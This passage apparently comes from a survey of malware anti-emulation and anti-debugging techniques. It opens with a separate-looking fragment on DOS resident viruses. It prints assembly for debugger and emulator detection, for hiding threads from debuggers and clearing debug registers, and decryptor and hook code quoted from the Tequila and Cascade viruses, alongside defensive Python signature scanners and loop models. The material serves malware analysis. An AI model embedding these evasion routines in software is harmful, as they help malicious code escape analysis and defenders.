The second class will activate when the infected program is
called, and then pass partial control to the original program.
The virus, however, will remain operational during the time that
the infected program is running. If this can be accomplished, it
is only a slight jump to write a fully memory resident virus.

Resident viri are the most successful, and the most dangerous, of
viral programs. A resident virus will become active when an
infected program is run (or at boot time for boot sector
infectors), and remain active until the computer is rebooted or
turned off. (Some viral programs are even able to trap the
rebooting sequence that is normally called when you press Ctrl-
Alt-Del on an MS-DOS PC, and thus are able to survive a "warm
boot.") The most successful of the file infectors, the Jerusalem
virus, is resident, as are all boot sector infectors. (For
fairly obvious reasons; the boot sector is never "called" in
normal operation.)

If a virus is active in memory, it is a waste of time trying to
disinfect a file or disk. No sooner is the file "cleaned", than
it becomes a suitable target for re-infection. You may try to
disinfect a hard disk right down to performing a low level
format: as soon as the disk is reformatted it may be infected all
over again. This is why all directions for disinfection stress
the necessity of "cold" booting from a disk that is known to be
free of infection before attempting any cleanup.

Anti-debugging and Anti-emulation Techniques (part 2)

2.3 Overextending the emulator



Overextending the emulator is defined as executing a set of instructions that will cause the emulator to crash or that may indicate that an emulator is running. Calling undocumented instructions that an emulator may not support is one way to cause the emulator to throw an exception and stop running. One such example is the undocumented CPU Instruction SALC that is used in W95/Vulcano [9]. Another way to detect emulation or to crash the emulator currently running, if there is one, is to try to access large portions of memory at once [1]. This is usually not effective though because most operating systems, as well as emulators, will impede the program.

A way to detect whether an emulator is running is to call a function twice that should return two different values. An example of this would be calling any of the time functions twice and verifying that there is a difference between the two return values. In Windows this can be achieved through kernel32!QueryPerformanceCounter, which wraps ZwQueryPerformanceCounter, through kernel32!GetTickCount, or by querying the number of CPU cycles executed since the machine started using the RDTSC (read time stamp counter) instruction. An example of the latter is below [15].


push offset handler
push dword ptr fs:[0]
mov fs:[0],esp
rdtsc
push eax
xor eax, eax
div eax ;trigger exception
rdtsc
sub eax, [esp] ;ticks delta
add esp, 4
pop fs:[0]
add esp, 4
cmp eax, 10000h ;threshold
jb @not_debugged
@debugged:
...
@not_debugged:
...
handler:
mov ecx, [esp+0Ch]
add dword ptr [ecx+0B8h], 2 ;skip div
xor eax, eax
ret



The example above shows how the RDTSC instruction can be used to detect whether a debugger is present. RDTSC is executed twice, with a deliberately faulting instruction in between, and the difference of the two values is computed. This difference is then compared to a threshold (10000h in this example). If the difference is greater, then a debugger is present and a jump away from the malicious code is executed.

Importing obscure libraries may not actually cause the emulator to stop running, but if the library is not imported, the malware code itself may not run.

Malware can also request a web page to see whether it has Internet access. Besides preventing the virus code from running on a machine that is not currently connected to the Internet, this stops execution when an emulator is running, since most emulators do not allow Internet access [1].

Using coprocessor (FPU) instructions is another way to overextend the emulator, because most emulators do not emulate them. The Prizzy polymorphic engine (PPE) can generate 43 different coprocessor instructions for use in its polymorphic decryptor. If the emulator does not provide these FPU instructions, the Prizzy decryptor does not run.

Along the same lines, malware can use MMX instructions. This instruction set adds 8 new registers to the architecture. The malware will check to see if MMX support exists by using the CPUID instruction. Examples of malware that use this technique are W32/Legacy and W32/Thorin.

Malware will also set up an exception handler, execute a garbage block of code, and then indirectly execute its own handler to transfer control to another part of the polymorphic decryptor, in the hope that the emulator cannot handle the exception [9]. An example similar to this technique is shown in section 3.7.



3. Anti-debugging



Anti-debugging techniques are any attempt by the malware to detect that it is being debugged. To do this, the malware can examine its own code for breakpoints or check for a debugger directly through system calls.



3.1 Breakpoints



To examine its code for breakpoints, the malware can look for the 0xcc opcode instruction, which raises a SIGTRAP. This is the instruction the debugger will use to gain control from the malware at a breakpoint. The malware can also set false breakpoints if the malware code itself has a signal handler. This way it can continue to execute instructions after the breakpoint that it set.

Malware can also try to overwrite the breakpoints. The W95/Marburg virus uses a backwards decryption loop that overwrites the breakpoint. The viruses in the Yankee_doodle family, on the other hand, use a Hamming code to self-correct their code. A Hamming code lets a program detect and correct errors; here it lets the virus detect and remove breakpoints in its code [9].



3.2 Calculating the checksum



Malware can also checksum its own code. If the checksum has changed, the virus can assume that it is being debugged and that breakpoints have been placed within the code [3]. VAMPiRE is an anti-anti-debugging tool that gets around this detection of breakpoints [12]. VAMPiRE accomplishes this by keeping a table in memory of the breakpoints that have been set. The program consists of a page-fault handler (PFH), a general protection fault handler (GPFH), a single-step handler and a framework API. When a breakpoint is triggered, either the PFH (which handles breakpoints set on code, data, or memory-mapped I/O) or the GPFH (which handles legacy I/O breakpoints) receives control. The single-step handler is used for breakpoint persistence, allowing breakpoints to be used more than once.



3.3 Detecting the debugger



A very simple way of detecting a debugger on a Linux system is to call ptrace, since ptrace cannot be called more than once in succession for a given process [3]. In Windows, the IsDebuggerPresent call returns 1 if the program is being debugged and 0 otherwise. It simply checks a flag that the debugger sets when it is running. This check can be done directly by reading the byte at offset 2 of the Process Environment Block (PEB). The following code is an example of this technique.



mov eax, fs:[30h]
movzx eax, byte ptr [eax+2]
test eax, eax
jne @DebuggerDetected



As the above example shows, eax is set to the address of the PEB (Process Environment Block), and the byte at offset 2 of that block is then loaded into eax. A check is done to see whether eax is zero. If it is, there is no debugger present; if not, there is a debugger.

When a process is created with a debugger already running, the system sets certain flags for the heap manipulation routines in the Windows dll ntdll.dll. These flags are FLG_HEAP_ENABLE_TAIL_CHECK, FLG_HEAP_ENABLE_FREE_CHECK, and FLG_HEAP_VALIDATE_PARAMETERS. These flags can be checked using the following code:



mov eax, fs:[30h]
mov eax, [eax+68h]
and eax, 0x70
test eax, eax
jne @DebuggerDetected



In the above example, we again access the PEB, then read the flags word for the heap routines at offset 68h from the PEB address and mask it with 70h, which keeps only the three heap flags named above. If any of them is set, a debugger is present.

Checking flags within heap headers such as the ForceFlags is another way to detect whether a debugger is running or not. Here is an example [15]:



mov eax, fs:[30h]
mov eax, [eax+18h] ;process heap
mov eax, [eax+10h] ;heap flags
test eax, eax
jne @DebuggerDetected



The above example shows how the process heap and the heap flags can be accessed from the offset of the PEB. These are then tested to see if the Force Flags were previously set by a debugger currently running.

Another possible way to detect the debugger is through the NtQueryInformationProcess syscall. This function can be called with ProcessInformationClass set to 7 (ProcessDebugPort); the value it writes to the output variable is -1 if the process is being debugged and 0 otherwise. Below is an example [15].



push 0
push 4
push offset isdebugged
push 7 ;ProcessDebugPort
push -1
call NtQueryInformationProcess
test eax, eax
jne @ExitError
cmp isdebugged, 0
jne @DebuggerDetected



In this example, the parameters for the NtQueryInformationProcess syscall are first pushed onto the stack, last parameter first. They are: the return length pointer (0 here, meaning it is not wanted), the process information length (4 bytes), the address of the variable that receives the result (isdebugged), the process information class (7, ProcessDebugPort), and the process handle (-1, the current process). After the call, the status in eax is tested; a non-zero status means the call failed and the code exits. Otherwise isdebugged holds the debug port value: if it is non-zero, the process is running under a debugger; if it is zero, all is well.

Other simple ways of detecting the debugger are to check whether the device list contains the name of a debugger, to check the registry keys for a debugger, or to scan memory for the debugger's code [9].

Another method, similar to the EPO method, is to instruct the PE loader that the entry point of the program is referenced in the Thread Local Storage (TLS) entry in the PE header. This causes the code referenced from the TLS entry to execute before the real entry point of the program, so the TLS code can perform anti-debugging checks before the program even starts [15]. Starting from the TLS entry also allows the virus to begin execution before the debugger gains control, since some debuggers break on the main entry point of the program [9].
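For triage rather than evasion, the checks in this section (and the paired RDTSC reads of section 2.3) leave recognisable byte sequences in a 32-bit sample. The scanner below is an added example, not code from the paper or any cited work; it assumes the common encodings of these instructions (other registers or encodings in a real sample need additional patterns), and the code buffer it scans is constructed here from the snippets above.

```python
import re

# Both common encodings of "mov eax, fs:[30h]", the 32-bit PEB fetch.
PEB_FETCH = rb"(?:\x64\xA1\x30\x00\x00\x00|\x64\x8B\x05\x30\x00\x00\x00)"

# Raw-byte patterns for the checks discussed in the text. A short gap (.{0,8}?)
# is tolerated between the PEB fetch and the field access because real code
# often interleaves other instructions there; shrink it to cut false positives.
SIGNATURES = {
    # mov eax, fs:[30h] ; movzx eax, byte ptr [eax+2]        -> BeingDebugged
    "BeingDebugged": re.compile(PEB_FETCH + rb".{0,8}?\x0F\xB6\x40\x02", re.S),
    # mov eax, fs:[30h] ; mov eax, [eax+68h] ; and eax, 70h  -> heap flags at PEB+68h
    "NtGlobalFlag": re.compile(
        PEB_FETCH + rb".{0,8}?\x8B\x40\x68.{0,8}?\x83\xE0\x70", re.S),
    # mov eax, fs:[30h] ; mov eax, [eax+18h] ; mov eax, [eax+10h] -> process heap flags
    "HeapFlags": re.compile(
        PEB_FETCH + rb".{0,8}?\x8B\x40\x18.{0,8}?\x8B\x40\x10", re.S),
    # two rdtsc (0F 31) within 32 bytes of each other -> timing delta check (section 2.3)
    "RDTSC pair": re.compile(rb"\x0F\x31.{1,32}?\x0F\x31", re.S),
}


def scan(code: bytes) -> list:
    """Return (check name, offset) for every signature hit, in file order."""
    hits = []
    for name, pattern in SIGNATURES.items():
        for match in pattern.finditer(code):
            hits.append((name, match.start()))
    return sorted(hits, key=lambda hit: hit[1])


# Constructed sample: the section's snippets assembled by hand, padded with NOPs.
SAMPLE = (
    b"\x90" * 4
    # mov eax,fs:[30h] ; movzx eax,byte ptr [eax+2] ; test eax,eax ; jne +10h
    + b"\x64\xA1\x30\x00\x00\x00" + b"\x0F\xB6\x40\x02" + b"\x85\xC0" + b"\x75\x10"
    + b"\x90" * 6
    # mov eax,fs:[30h] (alternate encoding) ; mov eax,[eax+68h] ; and eax,70h ; test eax,eax
    + b"\x64\x8B\x05\x30\x00\x00\x00" + b"\x8B\x40\x68" + b"\x83\xE0\x70" + b"\x85\xC0"
    + b"\x90" * 6
    # mov eax,fs:[30h] ; mov eax,[eax+18h] ; mov eax,[eax+10h] ; test eax,eax
    + b"\x64\xA1\x30\x00\x00\x00" + b"\x8B\x40\x18" + b"\x8B\x40\x10" + b"\x85\xC0"
    + b"\x90" * 6
    # rdtsc ; push eax ; xor eax,eax ; div eax ; rdtsc ; sub eax,[esp]
    + b"\x0F\x31" + b"\x50" + b"\x31\xC0" + b"\xF7\xF0" + b"\x0F\x31" + b"\x2B\x04\x24"
)

if __name__ == "__main__":
    for name, offset in scan(SAMPLE):
        print(f"{offset:#06x}  {name}")
```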



3.4 Checking for single stepping



Another way that malware can detect a debugger is to check for single stepping. This can be done by pushing a value onto the stack, popping it off again, and then checking whether the value is still in the slot just beyond the stack pointer. When a debugger single steps a process, it pushes its own data onto the stack when it takes control and pops it back off before the next instruction executes, which overwrites that slot. So if the value has changed, something other than the running process has been using the stack [1]. Below is a code example of how malware can detect single stepping from the stack state [9]:



mov bp, sp ; pick stack pointer
push ax ; store any ax mark on the stack
pop ax ; pick the value from the stack
cmp word ptr [bp-2], ax ; compare against stack
jne debug ; if different, debugger detected.



As the comments in this example show, a value is pushed onto the stack and then popped off again. If a debugger is present, the word at [bp-2], the slot just below the saved stack pointer, will differ from the value that was just popped, and the appropriate action can be taken.



3.5 Checking for slowdown in runtime



By looking for slowdown in the runtime of the program, malicious code can also detect a debugger. A significant slowdown in runtime likely means that the code is being single stepped. So if the difference between the timestamps of two calls is too great, the malware can act accordingly [1]. The LTTng/LTTV Linux Trace Toolkit avoids this slowdown when tracing a virus, because LTTng/LTTV is a modular tool that traces the program without adding breakpoints or performing any analysis at the time of execution. It also uses a lockless re-entry mechanism, meaning that it does not lock any portions of the Linux kernel code that the program being traced might need to use, and therefore does not cause the traced program to slow down and wait [4].



3.6 Instruction prefetching



If the malicious code modifies the next instruction in a sequence and the new instruction is executed, then a debugger is running. This is due to instruction prefetching; if the new instruction is prefetched, this means there was a break in the execution of the process. Otherwise the original instruction would have been prefetched and executed [1].



3.7 Self modifying code



Malware can also modify its own code. One example is HDSpoof. This malware starts out with exception handlers installed and then removes them during execution, so that if anything goes wrong and an exception is thrown during execution, the virus terminates. It also modifies the exception handlers at other times, either removing or adding them. Below is an example of HDSpoof removing all exception handlers except for the default one [7].



exception handlers before:
0x77f79bb8 ntdll.dll:executehandler2@20 + 0x003a
0x0041adc9 hdspoof.exe+0x0001adc9
0x77e94809 __except_handler3
exception handlers after:
0x77e94809 __except_handler3

0x41b770: 8b44240c mov eax,dword ptr [esp+0xc]
0x41b774: 33c9 xor ecx,ecx
0x41b776: 334804 xor ecx,dword ptr [eax+0x4]
0x41b779: 334808 xor ecx,dword ptr [eax+0x8]
0x41b77c: 33480c xor ecx,dword ptr [eax+0xc]
0x41b77f: 334810 xor ecx,dword ptr [eax+0x10]
0x41b782: 8b642408 mov esp,dword ptr [esp+0x8]
0x41b786: 648f0500000000 pop dword ptr fs:[0x0]



Below is code in which HDSpoof creates a new exception handler [7].



0x41f52b: add dword ptr [esp],0x9ca
0x41f532: push dword ptr fs:[0x0]
0x41f539: mov dword ptr fs:[0x0],esp



3.8 Overwriting debugger information



Some malware uses techniques that overwrite debugger information and therefore cause either the debugger or the virus itself to function improperly.

By hooking the INT 1 and INT 3 interrupts (INT 3 is the 0xCC opcode byte that debuggers use), malware can cause the debugger to lose its context. This is harmless during normal execution of the virus. Another option is to hook the interrupts and call another interrupt to run the virus code indirectly. Below is the code from the Tequila virus that hooks INT 1.



new_interrupt_one:
push bp
mov bp,sp
cs cmp b[0a],1 ;masm mod. needed
je 0506 ;masm mod. needed
cmp w[bp+4],09b4
ja 050b ;masm mod. needed
push ax
push es
les ax,[bp+2]
cs mov w[09a0],ax ;masm mod. needed
cs mov w[09a2],es ;masm mod. needed
cs mov b[0a],1
pop es
pop ax
and w[bp+6],0feff
pop bp
iret



Normally the hook routine is set to IRET, as it is without a debugger installed. V2Px uses hooks to decrypt its body with INT 1 and INT 3. The INT 1 and INT 3 vectors are used continuously during execution of the code and calculations are done in the interrupt vector table.

Some viruses also clear the contents of the debug registers (DRn) [9]. This can be done in one of two ways. One way is to use the NtGetContextThread and NtSetContextThread syscalls. Another way is to generate an exception, modify the thread context and then resume normal execution with the new context. An example of this is below [15].


push offset handler
push dword ptr fs:[0]
mov fs:[0],esp
xor eax, eax
div eax ;generate exception
pop fs:[0]
add esp, 4
;continue execution
;...
handler:
mov ecx, [esp+0Ch] ;pointer to the CONTEXT record
add dword ptr [ecx+0B8h], 2 ;skip div
mov dword ptr [ecx+04h], 0 ;clean dr0
mov dword ptr [ecx+08h], 0 ;clean dr1
mov dword ptr [ecx+0Ch], 0 ;clean dr2
mov dword ptr [ecx+10h], 0 ;clean dr3
mov dword ptr [ecx+14h], 0 ;clean dr6
mov dword ptr [ecx+18h], 0 ;clean dr7
xor eax, eax
ret



The first line of the above example pushes the offset of the handler onto the stack so that its own handler gets control when the exception is thrown. The rest of the setup for transferring control to the handler follows, including setting eax to zero by XORing it with itself. The div eax instruction then generates an exception because the divisor, eax, is zero. The handler skips the divide instruction, clears dr0-dr7, sets eax to zero again to indicate that the exception was handled, and execution resumes.



3.9 Detaching the debugger thread



Detaching the thread from the debugger can be done with the NtSetInformationThread syscall. Calling this function with ThreadInformationClass set to 0x11 (ThreadHideFromDebugger), will detach the program’s thread from the debugger if there is a debugger present. The following code is an example [15]:



push 0
push 0
push 11h ;ThreadHideFromDebugger
push -2
call NtSetInformationThread



In this example, the parameters for NtSetInformationThread are first pushed onto the stack and then the function is called, removing the program's thread from the debugger. The pushes supply 0 for the thread information length and the thread information pointer, -2 as the thread handle, and 11h as the thread information class, which is the ThreadHideFromDebugger value.



3.10 Decryption



Decryption can be done in several different ways that also protect against debugging. Some decryption depends upon a specific execution path. If this execution path is not followed, due to a debugger being started at a specific point in the program, the value that the decryption algorithm uses may be incorrect. Therefore, the program will not decrypt itself correctly. HDSpoof uses this technique [7].

Some viruses use the stack to decrypt their code. Using a debugger on such a virus causes the decryption to fail, because the stack is used by INT 1 during debugging. One example is the W95/SK virus that decrypts and builds its code on the stack. Another example of this is the Cascade virus that uses the stack pointer register for one of the decryption keys. Below is the code:



lea si, Start ; position to decrypt
mov sp, 0682 ; length of encrypted body

Decrypt:
xor [si], si ; decryption key/counter 1
xor [si], sp ; decryption key/counter 2
inc si ; increment one counter
dec sp ; decrement the other
jnz Decrypt ; loop until all bytes are decrypted

Start: ; Virus body



The comments on the above example explain fairly well how the Cascade virus uses the stack pointer to decrypt the virus body. The Cryptor virus, on the other hand, stores its encryption keys in the keyboard buffer, which is also destroyed by a debugger. Tequila uses the decryptor’s code as the decryption key, so if the decryptor is modified with a debugger the virus will not be decrypted [9]. Below is the Tequila decryption code [13]:



perform_encryption_decryption:
mov bx,0
mov si,0960
mov cx,0960
mov dl,b[si]
xor b[bx],dl
inc si
inc bx
cmp si,09a0
jb 0a61 ;masm mod. needed
mov si,0960
loop 0a52 ;masm mod. needed
ret

the_file_decrypting_routine:
push cs
pop ds
mov bx,4
mov si,0964
mov cx,0960
mov dl,b[si]
add b[bx],dl
inc si
inc bx
cmp si,09a4
jb 0a7e ;masm mod. needed
mov si,0964
loop 0a6f ;masm mod. needed
jmp 0390 ;masm mod. needed
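An analyst who needs to recover such a body without running the sample reproduces the loop offline. The Python below is an added example, not code from either virus: it models the Cascade loop and Tequila's perform_encryption_decryption routine over a constructed memory image (body and decryptor bytes are made up here; offsets 0960h..09a0h follow the listing above), checks the round trip, and shows what a single 0xCC breakpoint byte written into Tequila's decryptor does to the decrypted body.

```python
"""Offline models of the Cascade and Tequila decryption loops quoted above.
Added example for analysis, not code from either virus: memory is a constructed
bytearray, and because both loops are XOR-based, running a loop once over a
plain body "encrypts" it and running it again recovers it."""


def cascade_loop(mem: bytearray, start: int, length: int) -> None:
    """lea si,Start / mov sp,0682 / xor [si],si / xor [si],sp / inc si / dec sp / jnz.
    si and sp are both loop counters and the two 16-bit XOR keys; each step
    touches the word at [si], so consecutive words overlap by one byte."""
    si, sp = start, length
    while True:
        word = mem[si] | (mem[si + 1] << 8)        # little-endian word at [si]
        word ^= si ^ sp                            # key/counter 1 and key/counter 2
        mem[si], mem[si + 1] = word & 0xFF, word >> 8
        si = (si + 1) & 0xFFFF                     # inc si
        sp = (sp - 1) & 0xFFFF                     # dec sp
        if sp == 0:                                # jnz Decrypt
            break


def tequila_loop(mem: bytearray, key_start: int = 0x960, key_end: int = 0x9A0,
                 count: int = 0x960) -> None:
    """perform_encryption_decryption: xor b[bx] with b[si] for cx = 0960h bytes
    from bx = 0, where si walks the decryptor's own bytes at 0960h..099Fh and
    wraps (cmp si,09a0 / mov si,0960). The key is the decryptor's code."""
    si = key_start
    for bx in range(count):
        mem[bx] ^= mem[si]
        si += 1
        if si >= key_end:
            si = key_start


# Constructed test data (not taken from a real sample).
PLAIN = bytes((i * 7 + 3) & 0xFF for i in range(0x960))       # plain "virus body"
DECRYPTOR = bytes(0x41 + (i % 0x3F) for i in range(0x40))     # key bytes; none is 0xCC


def build_tequila_image() -> bytearray:
    """Body at offset 0, decryptor at 0960h, body encrypted once."""
    mem = bytearray(PLAIN) + bytearray(DECRYPTOR)
    tequila_loop(mem)
    return mem


def tequila_decrypt_ok() -> bool:
    mem = build_tequila_image()
    tequila_loop(mem)                     # decryptor untouched: body recovered
    return bytes(mem[:0x960]) == PLAIN


def tequila_after_breakpoint() -> int:
    """A software breakpoint (0xCC) written into the decryptor changes one key
    byte; returns how many body bytes then decrypt incorrectly."""
    mem = build_tequila_image()
    mem[0x962] = 0xCC                     # the debugger's INT 3 patch, key offset 2
    tequila_loop(mem)
    return sum(1 for got, want in zip(mem[:0x960], PLAIN) if got != want)


def cascade_roundtrip_ok() -> bool:
    start, length = 0x100, 0x682
    body = bytes((i * 13 + 1) & 0xFF for i in range(length + 1))
    mem = bytearray(0x800)
    mem[start:start + length + 1] = body
    cascade_loop(mem, start, length)
    scrambled = bytes(mem[start:start + length + 1]) != body
    cascade_loop(mem, start, length)
    return scrambled and bytes(mem[start:start + length + 1]) == body
```

Every 64th body byte depends on the patched key byte, which is why a single breakpoint in the decryptor corrupts the body throughout rather than at one spot.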



Research is being done on new anti-debugging methods that may be used in the future. One such project works on a multiprocessor computer in which one processor is unused while debugging. This new technique uses parallel processing of the decryption code [11].



4. Other Anti-detection Techniques



4.1 Retroviruses



Retroviruses try to disable the anti-virus software. They do this by carrying a list of process names and killing the processes the program finds running. Many retroviruses also take the process off of the startup list so the process no longer starts when the computer boots. This type of malware may also try to starve the anti-virus software of CPU time or prevent the anti-virus software from connecting to the company’s servers to update its database [1].



5. Combining Techniques



The W32.Gobi virus is a polymorphic retrovirus that uses EPO and several anti-debugging techniques. This virus opens a backdoor on TCP port 666 [8].

Simile (also known as Metaphor) is a very well known and complex virus that is approximately 14,000 lines of assembly [9]. This virus uses EPO by looking for the ExitProcess() API call. It is also a metamorphic virus that uses polymorphic decryption [1]. About 90% of its code is spent on the polymorphic decryption. The virus body and polymorphic decryptor are placed in a semi-random place in a newly infected file each time. The first payload of Simile only activates during March, June, September or December. Variants A and B display their message on the 17th of these months. Variant C displays its message on the 18th. The second payload activates on the 14th of May in variants A and B and on the 14th of July in variant C [9].

Ganda is a retrovirus that uses EPO. It examines the list of startup processes and replaces the first instruction of each startup process with a return. This renders any antivirus programs useless [1].